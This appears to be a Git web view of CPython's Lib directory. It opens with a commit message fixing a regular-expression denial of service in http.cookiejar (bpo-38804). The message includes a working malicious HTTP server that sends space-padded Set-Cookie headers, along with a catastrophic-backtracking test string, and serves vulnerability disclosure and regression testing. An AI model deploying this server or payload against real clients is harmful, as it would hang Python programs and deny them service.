cpython/Lib
bcaller 1b779bfb85 bpo-38804: Fix REDoS in http.cookiejar (GH-17157)
The regex http.cookiejar.LOOSE_HTTP_DATE_RE was vulnerable to regular
expression denial of service (REDoS).

LOOSE_HTTP_DATE_RE.match is called when using http.cookiejar.CookieJar
to parse Set-Cookie headers returned by a server.
Processing a response from a malicious HTTP server can lead to extreme
CPU usage and execution will be blocked for a long time.

The regex contained multiple overlapping \s* capture groups.
Ignoring the ?-optional capture groups the regex could be simplified to

    \d+-\w+-\d+(\s*\s*\s*)$

Therefore, a long sequence of spaces can trigger bad performance.

Matching a malicious string such as

    LOOSE_HTTP_DATE_RE.match("1-c-1" + (" " * 2000) + "!")

caused catastrophic backtracking.

The fix removes ambiguity about which \s* should match a particular
space.

You can create a malicious server which responds with Set-Cookie headers
to attack all python programs which access it e.g.

    from http.server import BaseHTTPRequestHandler, HTTPServer

    def make_set_cookie_value(n_spaces):
        spaces = " " * n_spaces
        expiry = f"1-c-1{spaces}!"
        return f"b;Expires={expiry}"

    class Handler(BaseHTTPRequestHandler):
        def do_GET(self):
            self.log_request(204)
            self.send_response_only(204)  # Don't bother sending Server and Date
            n_spaces = (
                int(self.path[1:])  # Can GET e.g. /100 to test shorter sequences
                if len(self.path) > 1 else
                65506  # Max header line length 65536
            )
            value = make_set_cookie_value(n_spaces)
            for i in range(99):  # Not necessary, but we can have up to 100 header lines
                self.send_header("Set-Cookie", value)
            self.end_headers()

    if __name__ == "__main__":
        HTTPServer(("", 44020), Handler).serve_forever()

This server returns 99 Set-Cookie headers. Each has 65506 spaces.
Extracting the cookies will pretty much never complete.

Vulnerable client using the example at the bottom of
https://docs.python.org/3/library/http.cookiejar.html :

    import http.cookiejar, urllib.request
    cj = http.cookiejar.CookieJar()
    opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor(cj))
    r = opener.open("http://localhost:44020/")

The popular requests library was also vulnerable without any additional
options (as it uses http.cookiejar by default):

    import requests
    requests.get("http://localhost:44020/")

* Regression test for http.cookiejar REDoS

If we regress, this test will take a very long time.

* Improve performance of http.cookiejar.ISO_DATE_RE

A string like

"444444" + (" " * 2000) + "A"

could cause poor performance due to the 2 overlapping \s* groups,
although this is not as serious as the REDoS in LOOSE_HTTP_DATE_RE was.
2019-11-22 15:22:11 +01:00
..
asyncio Remove binding of captured exceptions when not used to reduce the chances of creating cycles (GH-17246) 2019-11-19 21:34:03 +00:00
collections bpo-36321: Fix misspelled attribute name in namedtuple() (GH-16858) 2019-10-20 10:19:47 -07:00
concurrent bpo-31783: Fix a race condition creating workers during shutdown (#13171) 2019-06-28 11:54:52 -07:00
ctypes Remove binding of captured exceptions when not used to reduce the chances of creating cycles (GH-17246) 2019-11-19 21:34:03 +00:00
curses [3.9] bpo-37116: Use PEP 570 syntax for positional-only parameters. (GH-12620) 2019-06-05 18:22:31 +03:00
dbm bpo-36232: Improve error message on dbm.open() when the db doesn't exist (GH-12060) 2019-04-29 16:23:28 -07:00
distutils bpo-38839: Fix some unused functions in tests (GH-17189) 2019-11-19 11:45:20 -08:00
email bpo-38332: Catch KeyError from unknown cte in encoded-word. (GH-16503) 2019-10-05 09:19:15 -07:00
encodings bpo-34519: Add additional aliases for HP Roman 8 (GH-8956) 2019-09-11 14:08:41 +01:00
ensurepip bpo-37449: Move ensurepip off of pkgutil and to importlib.resources (GH-15109) 2019-09-13 09:01:20 -07:00
html bpo-37328: remove deprecated HTMLParser.unescape (GH-14186) 2019-08-27 11:48:06 +09:00
http bpo-38804: Fix REDoS in http.cookiejar (GH-17157) 2019-11-22 15:22:11 +01:00
idlelib bpo-38636: Fix IDLE tab toggle and file indent width (GH-17008) 2019-11-20 01:18:39 -05:00
importlib Produce cleaner bytecode for 'with' and 'async with' by generating separate code for normal and exceptional paths. (#6641) 2019-11-21 09:11:43 +00:00
json json.tool: use stdin and stdout in default cmdlne arguments (GH-11992) 2019-05-14 18:52:42 +02:00
lib2to3 Remove binding of captured exceptions when not used to reduce the chances of creating cycles (GH-17246) 2019-11-19 21:34:03 +00:00
logging bpo-38781: Clear buffer in MemoryHandler flush (GH-17132) 2019-11-13 09:03:45 +00:00
msilib Remove binding of captured exceptions when not used to reduce the chances of creating cycles (GH-17246) 2019-11-19 21:34:03 +00:00
multiprocessing Remove binding of captured exceptions when not used to reduce the chances of creating cycles (GH-17246) 2019-11-19 21:34:03 +00:00
pydoc_data Python 3.9.0a1 2019-11-19 12:17:21 +01:00
site-packages
sqlite3 bpo-38185: Fixed case-insensitive string comparison in sqlite3.Row indexing. (GH-16190) 2019-09-17 09:20:56 +03:00
test bpo-38804: Fix REDoS in http.cookiejar (GH-17157) 2019-11-22 15:22:11 +01:00
tkinter bpo-38738: Fix formatting of True and False. (GH-17083) 2019-11-12 16:57:03 +02:00
turtledemo Mark files as executable that are meant as scripts. (GH-15354) 2019-09-09 07:16:33 -07:00
unittest bpo-38857: AsyncMock fix for awaitable values and StopIteration fix [3.8] (GH-17269) 2019-11-20 16:27:51 -08:00
urllib Remove binding of captured exceptions when not used to reduce the chances of creating cycles (GH-17246) 2019-11-19 21:34:03 +00:00
venv bpo-38344: Fix syntax in activate.bat (GH-16533) 2019-10-07 14:07:19 -07:00
wsgiref bpo-8138: Initialize wsgiref's SimpleServer as single-threaded (GH-12977) 2019-05-24 20:24:42 +03:00
xml Remove binding of captured exceptions when not used to reduce the chances of creating cycles (GH-17246) 2019-11-19 21:34:03 +00:00
xmlrpc bpo-38786: Add parsing of https links to pydoc (GH-17143) 2019-11-13 18:13:52 +02:00
__future__.py bpo-35526: make __future__.barry_as_FLUFL mandatory for Python 4.0 (#11218) 2018-12-19 08:19:39 -08:00
__phello__.foo.py
_bootlocale.py
_collections_abc.py bpo-37116: Use PEP 570 syntax for positional-only parameters. (GH-13700) 2019-06-01 11:00:15 +03:00
_compat_pickle.py bpo-37757: Disallow PEP 572 cases that expose implementation details (GH-15131) 2019-08-25 23:45:40 +10:00
_compression.py
_markupbase.py
_osx_support.py bpo-35257: Avoid leaking LTO linker flags into distutils (GH-10900) 2018-12-19 18:19:01 +01:00
_py_abc.py bpo-37116: Use PEP 570 syntax for positional-only parameters. (GH-13700) 2019-06-01 11:00:15 +03:00
_pydecimal.py bpo-36793: Remove unneeded __str__ definitions. (GH-13081) 2019-05-06 22:29:40 +03:00
_pyio.py closes bpo-27805: Ignore ESPIPE in initializing seek of append-mode files. (GH-17112) 2019-11-12 14:51:34 -08:00
_sitebuiltins.py
_strptime.py
_threading_local.py bpo-37116: Use PEP 570 syntax for positional-only parameters. (GH-13700) 2019-06-01 11:00:15 +03:00
_weakrefset.py bpo-36949: Implement __repr__ on WeakSet (GH-13415) 2019-05-20 10:01:07 -07:00
abc.py bpo-35609: Remove examples for deprecated decorators in the abc module. (GH-11355) 2018-12-31 09:56:21 +02:00
aifc.py bpo-37320: Remove openfp() of aifc, sunau and wave (GH-14169) 2019-06-18 00:00:24 +02:00
antigravity.py Change the xkcd link in comment over https. (GH-5452) 2018-09-13 22:45:00 -07:00
argparse.py Defer import of shutil which only needed for help and usage (GH-17334) 2019-11-21 22:51:45 -08:00
ast.py bpo-38049: Add command-line interface for the ast module. (GH-15724) 2019-09-09 23:36:13 +03:00
asynchat.py Remove binding of captured exceptions when not used to reduce the chances of creating cycles (GH-17246) 2019-11-19 21:34:03 +00:00
asyncore.py bpo-15999: Always pass bool instead of int to socket.setblocking(). (GH-15621) 2019-09-01 12:12:52 +03:00
base64.py
bdb.py Fix typos mostly in comments, docs and test names (GH-15209) 2019-08-30 16:21:19 -04:00
binhex.py
bisect.py bpo-38626: Add comment explaining why __lt__ is used. (GH-16978) 2019-10-28 21:38:50 -07:00
bz2.py bpo-35128: Fix spacing issues in warning.warn() messages. (GH-10268) 2018-11-01 12:33:35 +02:00
cProfile.py [3.9] bpo-37116: Use PEP 570 syntax for positional-only parameters. (GH-12620) 2019-06-05 18:22:31 +03:00
calendar.py bpo-28292: Mark calendar.py helper functions as private. (GH-15113) 2019-08-04 13:14:03 -07:00
cgi.py bpo-20504 : in cgi.py, fix bug when a multipart/form-data request has… (#10638) 2019-09-11 12:05:53 +01:00
cgitb.py
chunk.py
cmd.py
code.py
codecs.py bpo-33361: Fix bug with seeking in StreamRecoders (GH-8278) 2019-05-31 22:44:00 +03:00
codeop.py Remove binding of captured exceptions when not used to reduce the chances of creating cycles (GH-17246) 2019-11-19 21:34:03 +00:00
colorsys.py
compileall.py bpo-38470: Fix test_compileall.test_compile_dir_maxlevels() (GH-16789) 2019-10-15 11:26:13 +02:00
configparser.py fix typo in configparser doc (GH-12154) 2019-03-03 18:23:19 -08:00
contextlib.py [3.9] bpo-37116: Use PEP 570 syntax for positional-only parameters. (GH-12620) 2019-06-05 18:22:31 +03:00
contextvars.py
copy.py
copyreg.py bpo-33138: Change standard error message for non-pickleable and non-copyable types. (GH-6239) 2018-10-31 02:28:07 +02:00
crypt.py closes bpo-38402: Check error of primitive crypt/crypt_r. (GH-16599) 2019-10-07 21:22:17 -07:00
csv.py bpo-27497: Add return value to csv.DictWriter.writeheader (GH-12306) 2019-05-10 03:50:11 +02:00
dataclasses.py bpo-38431: Fix __repr__ method of InitVar to work with typing objects. (GH-16702) 2019-10-13 14:45:36 +03:00
datetime.py bpo-38155: Add __all__ to datetime module (GH-16203) 2019-09-19 14:34:41 +01:00
decimal.py
difflib.py bpo-38738: Fix formatting of True and False. (GH-17083) 2019-11-12 16:57:03 +02:00
dis.py bpo-38115: Deal with invalid bytecode offsets in lnotab (GH-16079) 2019-09-28 07:49:15 -07:00
doctest.py bpo-15999: Clean up of handling boolean arguments. (GH-15610) 2019-09-01 12:16:51 +03:00
enum.py Remove binding of captured exceptions when not used to reduce the chances of creating cycles (GH-17246) 2019-11-19 21:34:03 +00:00
filecmp.py Remove binding of captured exceptions when not used to reduce the chances of creating cycles (GH-17246) 2019-11-19 21:34:03 +00:00
fileinput.py bpo-37330: open() no longer accept 'U' in file mode (GH-16959) 2019-10-28 15:40:08 +01:00
fnmatch.py
formatter.py
fractions.py Add a minor `Fraction.__hash__()` optimization (GH-15313) 2019-08-16 21:09:16 -05:00
ftplib.py Enforce PEP 257 conventions in ftplib.py (GH-15604) 2019-09-02 21:21:33 -07:00
functools.py bpo-38565: add new cache_parameters method for lru_cache (GH-16916) 2019-11-11 23:30:18 -08:00
genericpath.py bpo-38807: Add os.PathLike to exception message raised by _check_arg_types (#17160) 2019-11-18 21:54:00 -08:00
getopt.py
getpass.py Remove binding of captured exceptions when not used to reduce the chances of creating cycles (GH-17246) 2019-11-19 21:34:03 +00:00
gettext.py bpo-36239: Skip comments in gettext infos (GH-12255) 2019-05-09 16:22:15 +02:00
glob.py bpo-37363: Add audit events for a range of modules (GH-14301) 2019-06-24 08:42:54 -07:00
gzip.py bpo-28286: Deprecate opening GzipFile for writing implicitly. (GH-16417) 2019-11-16 18:56:57 +02:00
hashlib.py bpo-38153: Normalize hashlib algorithm names (GH-16083) 2019-09-13 14:31:19 +01:00
heapq.py bpo-29984: Improve 'heapq' test coverage (GH-992) 2019-05-31 21:13:57 -07:00
hmac.py bpo-33604: Raise TypeError on missing hmac arg. (GH-16805) 2019-10-17 20:30:42 -07:00
imaplib.py Fix typos in comments, docs and test names (#15018) 2019-07-30 18:16:13 -04:00
imghdr.py
imp.py bpo-37330: open() no longer accept 'U' in file mode (GH-16959) 2019-10-28 15:40:08 +01:00
inspect.py bpo-38478: Correctly handle keyword argument with same name as positional-only parameter (GH-16800) 2019-10-15 12:40:02 +01:00
io.py bpo-36842: Implement PEP 578 (GH-12613) 2019-05-23 08:45:22 -07:00
ipaddress.py bpo-32820: Simplify __format__ implementation for ipaddress. (GH-16378) 2019-09-27 20:02:58 +03:00
keyword.py bpo-36143: Regenerate Lib/keyword.py from the Grammar and Tokens file using pgen (GH-12456) 2019-03-25 22:01:12 +00:00
linecache.py
locale.py bpo-18378: Recognize "UTF-8" as a valid name in locale._parse_localename (GH-14736) 2019-08-29 00:33:52 -04:00
lzma.py
mailbox.py bpo-31522: mailbox.get_string: pass `from_` parameter to `get_bytes` (#9857) 2018-10-18 20:21:47 -04:00
mailcap.py
mimetypes.py bpo-38449: Revert "bpo-22347: Update mimetypes.guess_type to allow oper parsing of URLs (GH-15522)" (GH-16724) 2019-10-11 22:41:35 -07:00
modulefinder.py bpo-37032: Add CodeType.replace() method (GH-13542) 2019-05-24 23:57:23 +02:00
netrc.py
nntplib.py bpo-37390: Add audit event table to documentations (GH-14406) 2019-06-27 10:47:59 -07:00
ntpath.py bpo-38453: Ensure ntpath.realpath correctly resolves relative paths (GH-16967) 2019-11-15 09:49:21 -08:00
nturl2path.py
numbers.py
opcode.py Produce cleaner bytecode for 'with' and 'async with' by generating separate code for normal and exceptional paths. (#6641) 2019-11-21 09:11:43 +00:00
operator.py bpo-37116: Use PEP 570 syntax for positional-only parameters. (GH-13700) 2019-06-01 11:00:15 +03:00
optparse.py bpo-34605: Avoid master/slave terms (GH-9101) 2018-09-07 17:30:33 +02:00
os.py closes bpo-25461: Update os.walk() docstring to match the online docs. (GH-11836) 2019-09-10 13:43:58 +01:00
pathlib.py Revert "bpo-38811: Check for presence of os.link method in pathlib. (GH-17170)" (#17219) 2019-11-18 12:26:37 +01:00
pdb.py bpo-38723: Pdb._runscript should use io.open_code() instead of open() (GH-17127) 2019-11-12 14:42:47 -08:00
pickle.py bpo-37210: Fix pure Python pickle when _pickle is unavailable (GH-14016) 2019-06-13 13:58:51 +02:00
pickletools.py bpo-36785: PEP 574 implementation (GH-7076) 2019-05-26 17:10:09 +02:00
pipes.py
pkgutil.py
platform.py bpo-35389: platform.platform() calls libc_ver() without executable (GH-14418) 2019-06-27 09:04:28 +02:00
plistlib.py bpo-36409: Remove old plistlib API deprecated in 3.4 (GH-15615) 2019-09-05 10:11:35 +02:00
poplib.py Remove binding of captured exceptions when not used to reduce the chances of creating cycles (GH-17246) 2019-11-19 21:34:03 +00:00
posixpath.py bpo-35755: Remove current directory from posixpath.defpath (GH-11586) 2019-04-17 17:05:30 +02:00
pprint.py bpo-37376: pprint support for SimpleNamespace (GH-14318) 2019-06-26 16:13:18 -07:00
profile.py [3.9] bpo-37116: Use PEP 570 syntax for positional-only parameters. (GH-12620) 2019-06-05 18:22:31 +03:00
pstats.py Fix typos in docs and docstrings (GH-13745) 2019-06-03 01:12:33 +02:00
pty.py
py_compile.py bpo-22640: Add silent mode to py_compile.compile() (GH-12976) 2019-05-28 19:29:04 +03:00
pyclbr.py Fix typos in docs and docstrings (GH-13745) 2019-06-03 01:12:33 +02:00
pydoc.py bpo-38786: Add parsing of https links to pydoc (GH-17143) 2019-11-13 18:13:52 +02:00
queue.py bpo-37394: Fix pure Python implementation of the queue module (GH-14351) 2019-06-25 02:53:30 +01:00
quopri.py bpo-15999: Clean up of handling boolean arguments. (GH-15610) 2019-09-01 12:16:51 +03:00
random.py bpo-32554: Deprecate hashing arbitrary types in random.seed() (GH-15382) 2019-08-22 09:19:36 -07:00
re.py bpo-36548: Improve the repr of re flags. (GH-12715) 2019-05-31 10:39:47 +03:00
reprlib.py
rlcompleter.py
runpy.py bpo-38722: Runpy use io.open_code() (GH-17234) 2019-11-18 11:11:13 -08:00
sched.py
secrets.py
selectors.py
shelve.py
shlex.py Add docstring for shlex.split (GH-16740) 2019-10-31 10:23:20 +00:00
shutil.py bpo-38319: Fix shutil._fastcopy_sendfile(): set sendfile() max block size (GH-16491) 2019-10-01 11:40:54 +08:00
signal.py bpo-34282: Fix Enum._convert shadowing members named _convert (GH-8568) 2018-09-12 10:28:53 -07:00
site.py bpo-37369: Fix initialization of sys members when launched via an app container (GH-14428) 2019-06-29 10:34:11 -07:00
smtpd.py bpo-35800: Deprecate smtpd.MailmanProxy (GH-11675) 2019-10-12 10:24:26 -07:00
smtplib.py bpo-38341: Add SMTPNotSupportedError in the exports of smtplib (#16525) 2019-10-04 17:30:58 -07:00
sndhdr.py
socket.py bpo-38319: Fix shutil._fastcopy_sendfile(): set sendfile() max block size (GH-16491) 2019-10-01 11:40:54 +08:00
socketserver.py Fix typo in Lib/socketserver.py (GH-17024) 2019-11-16 19:14:45 +01:00
sre_compile.py Simplify flags checks in sre_compile.py. (GH-9718) 2018-10-05 20:53:45 +03:00
sre_constants.py bpo-36793: Remove unneeded __str__ definitions. (GH-13081) 2019-05-06 22:29:40 +03:00
sre_parse.py bpo-37723: Fix performance regression on regular expression parsing. (GH-15030) 2019-07-31 21:50:39 +03:00
ssl.py bpo-37463: match_hostname requires quad-dotted IPv4 (GH-14499) 2019-07-02 11:39:42 -07:00
stat.py bpo-38109: Add missing constants to Lib/stat.py (GH-16665) 2019-10-10 09:34:46 +02:00
statistics.py bpo-38385: Fix iterator/iterable terminology in statistics docs (GH-17111) 2019-11-11 23:35:06 -08:00
string.py bpo-38208: Simplify string.Template by using __init_subclass__(). (GH-16256) 2019-10-21 09:36:21 +03:00
stringprep.py
struct.py
subprocess.py bpo-38724: Implement subprocess.Popen.__repr__ (GH-17151) 2019-11-17 16:08:31 +02:00
sunau.py bpo-37320: Remove openfp() of aifc, sunau and wave (GH-14169) 2019-06-18 00:00:24 +02:00
symbol.py bpo-35766: Merge typed_ast back into CPython (GH-11645) 2019-01-31 12:40:27 +01:00
symtable.py bpo-34983: Expose symtable.Symbol.is_nonlocal() in the symtable module (GH-9872) 2018-10-20 01:46:00 +01:00
sysconfig.py bpo-38234: test_embed: test pyvenv.cfg and pybuilddir.txt (GH-16366) 2019-09-25 02:10:35 +02:00
tabnanny.py
tarfile.py Add missing docstrings for TarInfo objects (#12555) 2019-03-27 13:16:34 -07:00
telnetlib.py bpo-37363: Add audit events for a range of modules (GH-14301) 2019-06-24 08:42:54 -07:00
tempfile.py bpo-37363: Add audit events for a range of modules (GH-14301) 2019-06-24 08:42:54 -07:00
textwrap.py bpo-30754: Document textwrap.dedent blank line behavior. (GH-14469) 2019-06-29 21:20:03 -07:00
this.py
threading.py bpo-15999: Clean up of handling boolean arguments. (GH-15610) 2019-09-01 12:16:51 +03:00
timeit.py
token.py bpo-35975: Support parsing earlier minor versions of Python 3 (GH-12086) 2019-03-07 12:38:08 -08:00
tokenize.py bpo-5028: Fix up rest of documentation for tokenize documenting line (GH-13686) 2019-05-30 15:06:32 -07:00
trace.py [3.9] bpo-37116: Use PEP 570 syntax for positional-only parameters. (GH-12620) 2019-06-05 18:22:31 +03:00
traceback.py bpo-37685: Fixed __eq__, __lt__ etc implementations in some classes. (GH-14952) 2019-08-08 08:42:54 +03:00
tracemalloc.py bpo-37961, tracemalloc: add Traceback.total_nframe (GH-15545) 2019-10-15 14:00:16 +02:00
tty.py
turtle.py Fix typos in docs and docstrings (GH-13745) 2019-06-03 01:12:33 +02:00
types.py bpo-37032: Add CodeType.replace() method (GH-13542) 2019-05-24 23:57:23 +02:00
typing.py bpo-37838: get_type_hints for wrapped functions with forward reference (GH-17126) 2019-11-21 17:24:58 +00:00
uu.py bpo-33687: Fix call to os.chmod() in uu.decode() (GH-7282) 2019-01-17 17:15:53 +03:00
uuid.py bpo-28009: Fix uuid.uuid1() and uuid.get_node() on AIX (GH-8672) 2019-09-26 22:43:15 +03:00
warnings.py bpo-35178: Fix warnings._formatwarnmsg() (GH-12033) 2019-03-01 18:17:55 +01:00
wave.py Fix a typo in wave module docstring (GH-17009) 2019-11-04 22:32:10 -06:00
weakref.py bpo-38761: Register WeakSet as a MutableSet (GH-17104) 2019-11-10 20:12:04 -08:00
webbrowser.py bpo-37363: Add audit events for a range of modules (GH-14301) 2019-06-24 08:42:54 -07:00
xdrlib.py
zipapp.py
zipfile.py bpo-38635: Simplify decoding the ZIP64 extra field and make it tolerant to extra data. (GH-16988) 2019-11-09 13:13:36 +02:00
zipimport.py bpo-36842: Implement PEP 578 (GH-12613) 2019-05-23 08:45:22 -07:00